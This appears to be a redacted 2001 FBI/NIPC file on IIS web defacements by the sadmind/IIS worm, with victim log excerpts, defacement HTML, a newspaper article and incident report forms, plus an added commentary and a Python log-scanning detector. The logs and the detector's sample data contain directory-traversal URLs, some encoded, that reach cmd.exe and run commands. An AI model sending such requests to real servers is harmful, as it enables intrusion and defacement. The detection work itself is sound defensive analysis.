22:35:14 210.28.192.2 GET /scripts/root.exe 502
22:35:16 210.28.192.2 GET /scripts/root.exe 502
22:35:17 210.28.192.2 GET /scripts/root.exe 502
22:35:19 210.28.192.2 GET /scripts/../../winnt/system32/cmd.exe
22:35:21 210.28.192.2 GET /scripts/root.exe 502
22:35:23 210.28.192.2 GET /scripts/root.exe 502
22:35:28 210.28.192.2 GET /scripts/root.exe 502
22:35:30 210.28.192.2 GET /scripts/root.exe 502
22:35:31 210.28.192.2 GET /scripts/../../winnt/system32/cmd.exe
22:35:33 210.28.192.2 GET /scripts/root.exe 502
22:35:34 210.28.192.2 GET /scripts/root.exe 502
22:35:34 210.28.192.2 GET /scripts/root.exe 502
22:35:37 210.28.192.2 GET /scripts/root.exe 502
22:35:38 210.28.192.2 GET /scripts/../../winnt/system32/cmd.exe
22:35:40 210.28.192.2 GET /scripts/root.exe 502
22:35:41 210.28.192.2 GET /scripts/root.exe 502
22:35:43 210.28.192.2 GET /scripts/root.exe 502
22:35:44 210.28.192.2 GET /scripts/root.exe 502
22:35:46 210.28.192.2 GET /scripts/../../winnt/system32/cmd.exe
22:35:47 210.28.192.2 GET /scripts/root.exe 502
22:35:49 210.28.192.2 GET /scripts/root.exe 502
22:35:50 210.28.192.2 GET /scripts/root.exe 502
22:35:50 210.28.192.2 GET /scripts/root.exe 502
22:35:52 210.28.192.2 GET /scripts/../../winnt/system32/cmd.exe
22:35:54 210.28.192.2 GET /scripts/root.exe 502
22:35:56 210.28.192.2 GET /scripts/root.exe 502

22:35:57 210.28.192.2 GET /scripts/root.exe 502
22:35:59 210.28.192.2 GET /scripts/root.exe 502
22:36:01 210.28.192.2 GET /scripts/../../winnt/system32/cmd.exe 502
22:36:03 210.28.192.2 GET /scripts/root.exe 502
22:36:05 210.28.192.2 GET /scripts/root.exe 502
22:36:07 210.28.192.2 GET /scripts/root.exe 502
22:36:08 210.28.192.2 GET /scripts/root.exe 502
22:36:10 210.28.192.2 GET /scripts/../../winnt/system32/cmd.exe 502
22:36:11 210.28.192.2 GET /scripts/root.exe 502
22:36:13 210.28.192.2 GET /scripts/root.exe 502
22:36:17 210.28.192.2 GET /scripts/root.exe 502
22:36:19 210.28.192.2 GET /scripts/root.exe 502
22:36:20 210.28.192.2 GET /scripts/../../winnt/system32/cmd.exe 502
22:36:21 210.28.192.2 GET /scripts/root.exe 502
22:36:23 210.28.192.2 GET /scripts/root.exe 502
22:36:25 210.28.192.2 GET /scripts/root.exe 502
22:36:27 210.28.192.2 GET /scripts/root.exe 502

5/10/01 8:55 AM 
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' 22:36:29 210.28.192.2 GET /scripts/../. -/winnt/system32/cmd. exe 502 


22:36:31 210.28.192.2 GET /scripts/root.exe 502


After this, I found a bunch of index.asp, default.asp, index.htm ... files
left on my system, speaking unflatteringly of the USA.


The content of those messages was the following HTML:


<html><body bgcolor=black><br><br><br><br><br><br><table width=100%><td><p align="center"><font size=7 color=red>fuck USA Government</font><tr><td><p align="center"><font size=7 color=red>fuck PoizonBOx<tr><td><p align="center"><font size=4 color=red>contact:sysadmcn@yahoo.com.cn</html>


I'm sure this information may be useful to someone over there. I have a
question. Do you know of a place I can go for information on how to prevent
this in the future?


Thanks 


b6 
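The log excerpt in the message above is the trace the worm's IIS component leaves behind: a folder-traversal request (the MS00-078 "Web Server Folder Traversal" bug, which also accepted percent-encoded overlong UTF-8 spellings of "/" and "\") used to reach cmd.exe, followed by repeated requests for /scripts/root.exe, the copy of cmd.exe the worm drops into the scripts directory so that later commands need no traversal at all. The Python below is an added example, not code from the FBI file or from any of the reporting victims. It parses lines of the minimal "time ip method path [status]" shape seen in the excerpt, decodes encoded paths the same lenient way the vulnerable server did, and groups the flagged requests by source address. The sample log inside it is constructed: three lines copied from the excerpt plus hypothetical 10.0.0.x lines (one benign request and two encoded spellings of the same traversal).

```python
"""Flag sadmind/IIS-style requests in IIS log lines and summarise them by source.

Added example, not part of the FBI document. It parses the minimal
'time ip method path [status]' shape of the victim's log excerpt.
"""
import re
from typing import Dict, Optional, Tuple
from urllib.parse import unquote_to_bytes

# Constructed sample. The first three lines are copied from the log excerpt;
# the 10.0.0.x lines are hypothetical: one innocent request and two
# percent-encoded (overlong UTF-8) spellings of the same traversal.
SAMPLE_LOG = """\
22:35:31 210.28.192.2 GET /scripts/../../winnt/system32/cmd.exe
22:35:33 210.28.192.2 GET /scripts/root.exe 502
22:35:34 210.28.192.2 GET /scripts/root.exe 502
22:35:58 10.0.0.7 GET /index.asp 200
22:36:40 10.0.0.9 GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir 200
22:36:41 10.0.0.9 GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir 200
"""

LINE_RE = re.compile(r"^(\d\d:\d\d:\d\d)\s+(\S+)\s+(\S+)\s+(\S+)(?:\s+(\d{3}))?\s*$")


def lenient_utf8(raw: bytes) -> str:
    """Decode UTF-8 the way the vulnerable IIS decoder did: overlong sequences
    such as C0 AF ('/') and C1 9C ('\\') are accepted instead of rejected."""
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if b < 0x80:
            out.append(chr(b)); i += 1; continue
        if 0xC0 <= b <= 0xDF: need, cp = 1, b & 0x1F
        elif 0xE0 <= b <= 0xEF: need, cp = 2, b & 0x0F
        elif 0xF0 <= b <= 0xF7: need, cp = 3, b & 0x07
        elif 0xF8 <= b <= 0xFB: need, cp = 4, b & 0x03
        elif 0xFC <= b <= 0xFD: need, cp = 5, b & 0x01
        else:
            out.append("\ufffd"); i += 1; continue
        tail = raw[i + 1:i + 1 + need]
        if len(tail) != need or any(t & 0xC0 != 0x80 for t in tail):
            out.append("\ufffd"); i += 1; continue      # malformed: keep going
        for t in tail:
            cp = (cp << 6) | (t & 0x3F)
        out.append(chr(cp) if cp <= 0x10FFFF else "\ufffd")
        i += 1 + need
    return "".join(out)


def canonical_path(path: str) -> Tuple[str, bool]:
    """Return (resolved lower-case path, climbed); climbed is True when any
    '..' segment was present after decoding, i.e. the request tried to leave
    the virtual directory it named."""
    path = path.split("?", 1)[0]
    decoded = lenient_utf8(unquote_to_bytes(path)).replace("\\", "/")
    stack, climbed = [], False
    for seg in decoded.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            climbed = True
            if stack:
                stack.pop()
            continue
        stack.append(seg)
    return "/" + "/".join(stack).lower(), climbed


def classify(path: str) -> Optional[str]:
    """Label one request path, or None if it looks benign."""
    canon, climbed = canonical_path(path)
    if climbed and canon.endswith("/cmd.exe"):
        return "traversal-to-cmd.exe"     # folder traversal reaching the shell
    if canon == "/scripts/root.exe":
        return "root.exe-backdoor"        # the copy of cmd.exe the worm drops
    if climbed:
        return "traversal"
    return None


def scan(log_text: str) -> Dict[str, dict]:
    """Group flagged requests by source IP with counts and first/last timestamp."""
    report: Dict[str, dict] = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, ip, _method, path, _status = m.groups()
        kind = classify(path)
        if kind is None:
            continue
        e = report.setdefault(ip, {"hits": 0, "kinds": {}, "first": ts, "last": ts})
        e["hits"] += 1
        e["kinds"][kind] = e["kinds"].get(kind, 0) + 1
        e["last"] = ts
    return report


if __name__ == "__main__":
    for ip, e in scan(SAMPLE_LOG).items():
        print(f"{ip}: {e['hits']} hits {e['first']}-{e['last']} {e['kinds']}")
```

Run it over the full log rather than an excerpt. A single source that alternates one cmd.exe traversal with four root.exe requests every second or two, as 210.28.192.2 does above, is the worm's retry loop rather than a person at a keyboard. Note also that IIS logs 502 when a CGI program returns output without HTTP headers, which is exactly what cmd.exe does, so the 502s here do not show that the commands failed; the defaced index.asp and default.asp files the victim found afterwards show that they ran.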


From: NIPC-WATCH
To:  b6
Date: Wed, May 9, 2001  b7C


Subject: Utah Web Defacement 


Please see attached article regarding Utah Government Website Defacement by CHINA. 
NIPC Watch 


Subject: Computer Hackers' Assault Puts Utah Officials on Alert; Utah
Officials Alarmed by Web Attack
Date: Wed, 9 May 2001 16:53:22 -0400 


From:  b6
To:  b7C
b7E


The Salt Lake Tribune, May 8, 2001 
Copyright 2001 The Salt Lake Tribune 
The Salt Lake Tribune 

May 8, 2001, Tuesday : 

SECTION: Final; Pg. A1 

LENGTH: 736 words 


HEADLINE: Computer Hackers' Assault Puts Utah Officials on Alert; Utah
Officials Alarmed by Web Attack


BYLINE: BY GREG BURTON, THE SALT LAKE TRIBUNE 
BODY: 
COPYRIGHT 2001 THE SALT LAKE TRIBUNE 


Computer hackers attacked Utah over the weekend, injecting a virus that
defaced a handful of Web sites including pages operated by the state of
Utah, a defense subcontractor and The Salt Lake Tribune.


The intrusion was discovered early Monday on a demographics page for Utah 
Gov. Mike Leavitt's budget office, which had been replaced with the phrases 
"f--- USA Government" and "f--- PoizonBOx." A staff- access page at The 
Tribune was replaced at 10:28 a.m. with the same message. 


Utah Informational Technology Services Director Leon Miller said breaches to 
the state system were first clocked around 6 a.m. and that for most of the 
morning the state's "intrusion alarm was going crazy." 


While Utah officials first detected someone attempting to hack into their 
system with a "PoizonBOx" virus in late April, Miller said the attempts were 
not successful and he chose not to report the incidents. Monday's assault 
was too widespread to ignore. 


"As far as we know there's no permanent damage," he said. "But they are 
trying to scan passwords to find if they can find some to steal." 


Sverdrup Technology, a Tennessee contractor with offices at Hill Air Force 
Base, also was hit Monday by a hacker who accessed internal-use pages, said 
Frank Bria, president of the Utah Web development company NextQuo. 


"These were really hidden links, way deep down, and I suspect there are a
lot more out there that people don't know about," Bria said. "These weren't
just home pages -- so they had to really bore down."


Hill spokesman U.S. Air Force Maj. Sam Hudspath said hackers hadn't tried to 
penetrate the military's system but that computer security officers were 
aware of the threat and were taking appropriate precautions. 


While Monday's break-in was significant, Miller was equally alarmed by the 
growing number of failed hacking attempts on Utah's system since April 27. 
Despite constant monitoring since then, hackers broke through. 


"Anyone who says they can't be hacked is a fool, but we have a lot of 
safeguards in place," he said. 


"The point is this thing spread and we're suddenly finding it everywhere." 


Hackers using the phrase "PoizonBOx" previously struck sites in Australia,
China, Ecuador, Egypt, Trinidad, Turkey, the United Kingdom, Ukraine and
elsewhere in the United States.


Late last month a group of Chinese hackers threatened a "May Day War"
against sites in this country because they claimed PoizonBOx originated in
the United States. "We are obligated to strike back with utmost force after
such provocation by American hackers," a group of Chinese hackers was quoted
as saying in a May 1 Reuters news report.


While anti-PoizonBOx forces appeared to be behind Monday's attack in Utah, 
digital fingerprints left by the hackers could be designed to mislead. One 
obvious clue was an e-mail address made to look as if it came from China. 


Because Monday's virus infected at least two different platforms, Nextel and 
Microsoft, Bria said a sophisticated intruder was involved. 


And while the virus did not appear to be malicious and no permanent damage
was reported, the scope of the attack won't be known for days, he said.
"They could have planted some worm behind the fire wall."


Computer experts in Utah were following one lead that suggested the hacking
originated in Rio De Janeiro, Brazil, Miller said. Bria and other experts,
however, suspect the attacks are linked to the digital dogfight between
China and the United States.


Since the April 1 midair collision between an American spy plane and a
Chinese fighter jet, the computer warfare has spread.


According to the FBI's National Infrastructure Protection Center (NIPC),
hacking activity against the United States was supposed to increase until
Monday, the anniversary of the accidental bombing by the United States of
the Chinese Embassy in Belgrade, Yugoslavia.


Calling the intruders "malicious hackers," federal officials said several
U.S. sites already have been unlawfully defaced, "replacing existing content
with pro-Chinese or anti-U.S. rhetoric."


Another virus stalking the Internet, called "Lion," was traced back to a 
Chinese e-mail address, NIPC reported. 


Utah officials planned to work through Monday evening checking their system. 


"We want to find what the vulnerability was so this doesn't happen again," 
Miller said. 


gburton@sltrib.com <mailto:gburton@sltrib.com> 
From:


To: 
Date: Thu, May 10, 2001 7:08 PM 
Subject: China Intrusion 


Subject: Cyber Incident Report Form


Date: Thu, 10 May 2001 12:19:53 -0600
To: <nipc.watc L.gov>

Report_Time=5/10/01 12:00 P.M.
Name=
Title=
Telephone=
Email=
Organization=P5 e.Health Services
Addrs_Street=2455 E. Parleys Way Suite #300
City=Salt Lake City
State=Utah
Zip Code=84109
Country=USA

Question1_Organization=P5 e.Health Services
Question1_Contact_Info=
Question1_Tele_Number=
Question1_Street=SAME
Question1_City_State_Zipcd=
Question1_Country=
Question1_Email=

Question2_Location=All 3 of our IIS 5.0 Web Servers
Question3_Date_Time=5/7/01 2:00 P.M.
Question4_Critical=Yes
Question5_crit_infrasture=Other
Question5_Remarks=Medical Health Claims
Question6_nature_of_prob=Web site defacement
Question6_other=
Question7_exp_problem=No
Question7_Remarks=No Remarks
Question8_method_of_attack=Unknown
Question8_Remarks=No Remarks
Question9_sus_perpetrators=Unknown
Question9_Remarks=No Remarks
Question10_ip_addrs=Don't know
Question11_evid_of_spoof=Unknown
Question12_oper_systems=NT
Question12_Remarks=IIS 5.0
Question13_security_infrasture=Encryption
Question13_security_infrasture=Firewall
Question13_security_infrasture=Access Control Lists
Question14_attack_loss_info=No
Question14_Remarks=No Remarks
Question15_damage_systms=Yes
Question15_Remarks=
Question16_what_actions=Backup of affected system(s)
Question16_Remarks=No Remarks


b6 
Yes. %sysroot%\c:\inetpub\scripts folder contains all of the hackers' defacing
code. At least I hope that is it.

Question17_fieldoff_inform=Yes
Question17_Field_Office=There's been an outbreak here
Question18_agency_inform=No
Question18_State_local_Police=
Question18_Inspector_General=
Question18_CERT-CC=
Question18_FedCIRC=
Question18_JTF-CND=
Question18_Other=
Question19_date_of_last_update=1 month ago
Question19_org_work_update=ME
Question20_POC_Information=
Question20_sys_adm_contract=No
Share_Info_With=Public
Share_Info_With=Infrastructure Orgs
Question21_remarks=This is what was contained on our web site, by the
hacker:


fuck USA Government 
fuck PoizonBOx 


contact:sysadmcn@yahoo.com.cn 


From: NIPC-WATCH 


To: 
Date: Sun, May 6, 2001 11:13 PM 
Subject: Incident Report 




The Watch received the following incident report from [b6], Miles City Unified School District,
1604 Main Street, Miles City, Montana 59301. The Watch forwarded the incident report to SSA [b7C],
Salt Lake City FO. Serial number 050601-006-41381.


NIPC Watch 


Subject: Cyber Incident Report Form


Date:
From:
To: <nipc.watc L.gov>


Name=
Telephone=
Fax_Number=
Email=
Organization=Miles City Unified School District
Addrs_Street=1604 Main St.

City=Miles City 

State=Montana 

Zip Code=59301 

‘Country=USA 
Question1_Organization=SAME
Question1_Contact_Info=
Question1_Tele_Number=
Question1_Street=SAME
Question1_City_State_Zipcd=
Question1_Country=
Question1_Email=

Question2_Location=Telco Closet
Custer County District High School
20 S. Center Ave.
Miles City, MT 59301
(406) 232-4920

Question3_Date_Time=May 6, 2001 6:
Question4_Critical=No
Question5_Remarks=No Remarks
Question6_nature_of_prob=Intrusion
Question6_nature_of_prob=Web site defacement
Question6_other=
Question7_exp_problem=No
Question7_Remarks=No Remarks
Question8_method_of_attack=Vulnerability exploited
Question8_method_of_attack=Other
Question8_Remarks=No REMARK




b6 


SEARCHED  INDEXED
SERIALIZED  FILED

MAY 15, 2001

SALT LAKE CITY

FBI  b6  b7C


Question9_sus_perpetrators=Other
Question9_Remarks=Chinese threatened hack.
Question10_ip_addrs=Can be supplied upon request. Not yet known.
Question11_evid_of_spoof=Unknown
Question12_oper_systems=NT
Question12_Remarks=IIS 4.0
Question13_security_infrasture=Firewall
Question14_attack_loss_info=No
Question14_Remarks=No Remarks
Question15_damage_systms=No
Question15_Remarks=No Remarks
Question16_Remarks=No Remarks
Question17_Field_Office=
Question17_fieldoff_inform=No
Question18_agency_inform=No
Question18_State_local_Police=
Question18_Inspector_General=
Question18_CERT-CC=
Question18_FedCIRC=
Question18_JTF-CND=
Question18_Other=
Question19_date_of_last_update=
Question19_org_work_update=
Question20_POC_Information=
Question20_sys_adm_contract=No
Question21_remarks=No additional remarks
NOTE: Hand print names legibly; handwriting satisfactory for remainder.
Indices: [ ] Negative [ ] See below


Character of case 




Subject's name and aliases 


FNU LNU 


[ ] Personal


Address of Subject 
UNK 


Subject’s 
Fi 


Complaint received: [X] Telephonic  Date 05/03/01  Time 12:15 am
Complainant's address and telephone number
6125 Silver Creek Drive
Park City, UT 84068
Complainant's DOB 02/02/58  Sex Male
Employer  Address  Telephone

Facts of Complaint
Rolls Royce in Park City, Utah, 6125 Silver Creek Drive has a
website at rolls-roycegs.com. On 02/02/01 a message defacing the website
was hacked in. The message stated in large letters, "FUCK USA
GOVERNMENT, FUCK POISON BOX" and in small letters underneath was
"contact:sysadmcn@yahoo.com.cn". The message was in red and black.
Complainant stated that the message was noticed only minutes after it was
received. The website is administrated by Qwest with their standard
firewalls.


Do not write in this space. 


BLOCK STAMP 